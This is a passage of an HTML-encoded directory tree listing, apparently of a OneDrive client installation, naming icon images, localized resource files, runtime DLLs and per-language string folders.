&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; people.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; phone.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; pictures.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; profile.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; recycle-bin20x20@2x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; recycle-bin20x20.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; recycle-bin.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; reportProblemIcon22x22.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; settingsIcon22x22.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; settingsIcon@2x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; settingsIcon.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; share20x20@2x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; share20x20.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; stack20x20@2x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; stack20x20.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; syncIcon.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; syncStatusError.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; syncStatusOffline.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; syncStatusSynced@2x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; syncStatusSynced@3x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; syncStatusSynced.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; syncStatusSyncing.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; syncStatusWarning.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; unlockIcon22x22.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; videos.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; view-online20x20@2x.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; view-online20x20.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; view-online.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; warning.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; welcome.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; freView
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; assets
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; dark
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; optionalDiagnosticData.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; light
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9492;&#9472;&#9472; optionalDiagnosticData.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; index.windows.bundle
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ca
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ca-Es-VALENCIA
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Camera_Upload_Success_Dark_728x360.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Camera_Upload_Success_Light_728x360.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Camera_Upload_Upsell_Dark_728x360.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Camera_Upload_Upsell_Light_728x360.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CheckboxWindows.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CollectSyncLogs.bat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; com.microsoft.onedrive.nucleus.auth.provider.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; concrt140_app.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; concrt140.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Copilot
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Square44x44Logo.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Square44x44Logo.targetsize-16_altform-lightunplated.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Square44x44Logo.targetsize-16_altform-unplated.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Square44x44Logo.targetsize-16.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Square44x44Logo.targetsize-24_altform-lightunplated.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Square44x44Logo.targetsize-24_altform-unplated.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Square44x44Logo.targetsize-24.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Square44x44Logo.targetsize-256_altform-lightunplated.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Square44x44Logo.targetsize-256_altform-unplated.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Square44x44Logo.targetsize-256.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Square44x44Logo.targetsize-32_altform-lightunplated.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Square44x44Logo.targetsize-32_altform-unplated.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Square44x44Logo.targetsize-32.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Square44x44Logo.targetsize-48_altform-lightunplated.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Square44x44Logo.targetsize-48_altform-unplated.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Square44x44Logo.targetsize-48.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Strings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; AF-ZA
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; AM-ET
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; AR-SA
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; AS-IN
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; AZ-LATN-AZ
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; BG-BG
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; BN-IN
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Resources.resw
